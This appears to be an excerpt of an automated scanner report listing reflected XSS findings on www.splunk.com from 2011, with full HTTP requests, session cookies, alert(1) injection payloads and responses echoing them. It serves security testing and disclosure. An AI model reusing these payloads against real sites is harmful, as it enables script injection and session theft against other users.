GET /b1745--><script>alert(1)</script>cb09324f9b0/ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.368. http://www.splunk.com/base/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/base/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f613d'-alert(1)-'b85c464f7a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base/?f613d'-alert(1)-'b85c464f7a2=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]...
var versionIndex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base/Documentation?f613d'-alert(1)-'b85c464f7a2=1'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base/Documentation?f613d'-alert(1)-'b85c464f7a2=1"; }
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30614'-alert(1)-'db61a98f369 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base30614'-alert(1)-'db61a98f369/Documentation HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... geVersion( ) { var versionIndex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base30614'-alert(1)-'db61a98f369/Documentation'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base30614'-alert(1)-'db61a98f369/Documentation"; }
The value of REST URL parameter 1 is copied into an HTML comment. The payload c69a9--><script>alert(1)</script>dfef5875393 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /c69a9--><script>alert(1)</script>dfef5875393/Documentation HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:15:36 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: d74ef12050057023258dc4316660863a1297008936 Last-Modified: Sun, 06 Feb 2011 16:15:36 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eab6"><script>alert(1)</script>2a194ea043b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base3eab6"><script>alert(1)</script>2a194ea043b/Documentation HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base3eab6"><script>alert(1)</script>2a194ea043b/Documentation"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a265e"><script>alert(1)</script>82196131638 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base/Documentationa265e"><script>alert(1)</script>82196131638 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base/Documentationa265e"><script>alert(1)</script>82196131638"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2011f'-alert(1)-'35a486ae68e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base/Documentation2011f'-alert(1)-'35a486ae68e HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]...
var versionIndex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base/Documentation2011f'-alert(1)-'35a486ae68e'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base/Documentation2011f'-alert(1)-'35a486ae68e"; }
</script> ...[SNIP]...
4.374. http://www.splunk.com/base/Documentation [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/base/Documentation
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 445e3"><script>alert(1)</script>1d005539fca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base/Documentation?445e3"><script>alert(1)</script>1d005539fca=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base/Documentation?445e3"><script>alert(1)</script>1d005539fca=1"> ...[SNIP]...
4.375. http://www.splunk.com/base/Documentation [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/base/Documentation
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68caf'-alert(1)-'d4cdb67b19d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base/Documentation?68caf'-alert(1)-'d4cdb67b19d=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]...
var versionIndex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base/Documentation?68caf'-alert(1)-'d4cdb67b19d=1'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base/Documentation?68caf'-alert(1)-'d4cdb67b19d=1"; }
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cce9"><script>alert(1)</script>e7165443f5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base8cce9"><script>alert(1)</script>e7165443f5e/Documentation/4.1.6/ReleaseNotes/4.1.6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base8cce9"><script>alert(1)</script>e7165443f5e/Documentation/4.1.6/ReleaseNotes/4.1.6"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 615a6--><script>alert(1)</script>518ba201284 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /615a6--><script>alert(1)</script>518ba201284/Documentation/4.1.6/ReleaseNotes/4.1.6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22f49'-alert(1)-'27f5c74605b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base22f49'-alert(1)-'27f5c74605b/Documentation/4.1.6/ReleaseNotes/4.1.6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
